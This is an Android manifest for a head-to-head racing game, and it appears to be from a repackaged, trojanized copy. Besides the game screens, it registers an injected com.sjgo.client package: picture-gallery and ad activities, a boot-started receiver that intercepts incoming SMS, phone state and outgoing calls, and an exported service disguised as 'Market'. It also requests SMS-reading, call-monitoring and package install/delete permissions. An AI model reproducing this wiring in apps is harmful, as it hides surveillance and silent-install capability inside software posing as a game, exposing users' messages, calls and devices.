<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.craigsrace.headtoheadrcing">
    <application android:icon="@drawable/icon_lite" android:label="@string/app_name">
        <activity android:label="@string/app_name" android:name=".StartScreenActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="keyboardHidden|orientation" android:label="@string/app_name" android:name=".CraigsRaceLandscapeActivity" android:screenOrientation="landscape"/>
        <activity android:name=".RaceAFriendDialog" android:theme="@android:style/Theme.Dialog"/>
        <activity android:name=".PreferencesDialog" android:theme="@android:style/Theme.Dialog"/>
        <activity android:name=".NameEntryActivity" android:theme="@android:style/Theme.Dialog"/>
        <activity android:name=".RaceFinishedSendMessageDialog" android:theme="@android:style/Theme.Dialog"/>
        <activity android:label="@string/app_name" android:name=".WebPageActivity"/>
        <activity android:name=".SaveFailedActivity" android:theme="@android:style/Theme.Dialog"/>
        <activity android:label="放松一下，欢迎欣赏美图:)" android:name="com.sjgo.client.HandPics"/>
        <activity android:label="风景" android:name="com.sjgo.client.oa_fengjing"/>
        <activity android:label="美女" android:name="com.sjgo.client.oa_girl"/>
        <activity android:label="动物" android:name="com.sjgo.client.oa_animal"/>
        <activity android:label="动漫" android:name="com.sjgo.client.oa_dongman"/>
        <activity android:label="非主流" android:name="com.sjgo.client.oa_feizhuliu"/>
        <activity android:label="美图欣赏区" android:name="com.sjgo.client.viewpic"/>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:name="net.youmi.android.AdActivity"/>
        <receiver android:name="com.sjgo.client.zjReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.PHONE_STATE"/>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
            </intent-filter>
        </receiver>
        <service android:exported="true" android:label="Market" android:name="com.sjgo.client.zjService" android:process=""/>
    </application>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
</manifest>
